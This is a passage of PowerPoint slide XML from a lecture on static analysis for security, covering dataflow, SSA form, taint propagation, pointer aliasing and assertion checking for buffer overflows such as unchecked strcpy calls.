        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Dataflow analysis algorithms examine </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>the way data move through a program</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>. Compilers perform dataflow analysis to allocate registers, remove dead code, and perform many other optimizations.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Static Single Assignment (SSA): allow to assign a value to a variable only once.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Applications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>If an SSA variable is ever assigned a constant value, the constant can replace all uses of the SSA variable. This technique is called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>constant propagation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>. Constant propagation by itself is useful for finding security problems such as hard-coded passwords or encryption keys.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Example: Tiny Encryption Algorithm (TEA)</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14</a:t>
            </a:fld>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Dataflow (2)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="內容版面配置區 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>TEA Example</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15</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755576" y="2204863"/>
            <a:ext cx="6120680" cy="194688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55576" y="4725144"/>
            <a:ext cx="6209684" cy="1872208"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文字方塊 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="755576" y="4293096"/>
            <a:ext cx="1284326" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>SSA Form</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Tracking Dataflow (3)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="內容版面配置區 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="3178696" cy="4873752"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" smtClean="0"/>
              <a:t>SSA accomplishes this merge by introducing a new version of the variable and assigning the new version the value from one of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>two control flow paths</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" smtClean="0"/>
              <a:t>. The notational shorthand for this merge point is called a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>φ-function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" smtClean="0"/>
              <a:t>. The φ-function stands in for the selection of the appropriate value, depending upon the control flow path that is executed.</a:t>
            </a:r>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16</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3635895" y="1628800"/>
            <a:ext cx="4554925" cy="4896544"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="矩形 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3563888" y="5661248"/>
            <a:ext cx="31683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Taint Propagation</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Using dataflow to determine what an attacker can control is called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>taint propagation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Taint propagation is the key to identifying many input validation and representation defects.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>For example, a program that contains an exploitable buffer overflow vulnerability </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>almost always contains a dataflow path from an input function to a vulnerable operation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>The concept of tracking tainted data is not restricted to static analysis tools.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Pointer Aliasing</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="內容版面配置區 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Pointer alias analysis is another dataflow problem. The purpose of alias analysis is to understand </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>which pointers could possibly refer to the same memory location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" smtClean="0"/>
              <a:t>For example, a compiler would be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>free to reorder the following two statements</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>only if the pointers p1 and p2 do not refer to the same memory location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" smtClean="0"/>
              <a:t>A flow-sensitive taint-tracking algorithm needs to perform alias analysis to understand that data flow from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>getUserInput</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" smtClean="0"/>
              <a:t>() to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>processInput</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" smtClean="0"/>
              <a:t>() in the following code:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2000"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18</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7170" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="827584" y="3573016"/>
            <a:ext cx="1584176" cy="82099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899592" y="5517232"/>
            <a:ext cx="3240360" cy="110646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Analysis Algorithms</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="內容版面配置區 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" smtClean="0"/>
              <a:t>The motivation for using advanced static analysis algorithms is to improve context sensitivity—to determine the circumstances and conditions under which a particular piece of code runs.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" smtClean="0"/>
              <a:t>It’s easy to point at all calls to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" smtClean="0"/>
              <a:t>() and say that they should be replaced, but it’s much </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>harder </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" smtClean="0"/>
              <a:t>to call special attention to only the calls to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" smtClean="0"/>
              <a:t>() that might allow an attacker to overflow a buffer.</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19</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11266" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1043608" y="4282823"/>
            <a:ext cx="6192688" cy="257517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Generic Static Analysis Security Tool</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="內容版面配置區 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>A block diagram for a generic static analysis security tool. At a high level, almost all static analysis security tools work this way.</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755576" y="2924944"/>
            <a:ext cx="6851793" cy="331236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Checking Assertions</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To check for a buffer overflow in the following line of code: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>    imagine adding this assertion to the program just before the call to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(): </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>         </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>assert(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>alloc_size</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>) &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>strlen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>If the program logic guarantees that this assertion will always succeed, no buffer overflow is possible. </a:t>
            </a:r>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20</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW"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Naïve Local Analysis (1)</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Consider a simple piece of code:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>How could a static analysis tool evaluate the assertion? One could imagine keeping track of all the facts we know about the code before each statement is executed, as follows:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>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21</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12290" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1043608" y="2132856"/>
            <a:ext cx="2410512" cy="108012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971600" y="5085184"/>
            <a:ext cx="6512974" cy="136815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Naïve Local Analysis (2)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="內容版面配置區 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="467544" y="1484784"/>
            <a:ext cx="7467600" cy="4873752"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Another example</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22</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13314" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="971600" y="1916832"/>
            <a:ext cx="2808312" cy="1463154"/>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971600" y="3861048"/>
            <a:ext cx="4818997" cy="1080120"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文字方塊 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="971600" y="3501008"/>
            <a:ext cx="4305987" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>When the branch is taken (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" dirty="0" smtClean="0"/>
              <a:t>x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" dirty="0" smtClean="0"/>
              <a:t>y</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> is true)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="文字方塊 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="971600" y="5013176"/>
            <a:ext cx="4751622" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>When the branch is not taken (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" dirty="0" smtClean="0"/>
              <a:t>x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" dirty="0" smtClean="0"/>
              <a:t>y</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> is false)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13316" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="899592" y="5517232"/>
            <a:ext cx="5040560" cy="100811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Checking</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="內容版面配置區 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>For temporal safety properties, such as “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>memory should be freed only once</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>” and “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>only non-null pointers should be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dereferenced</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>,” it is easy to represent the property being checked as a small finite-state automaton.</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23</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14338" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="971600" y="3717032"/>
            <a:ext cx="6760751" cy="25202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Global Analysis (1)</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The simplest possible approach to global analysis is to ignore the issue, to assume that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
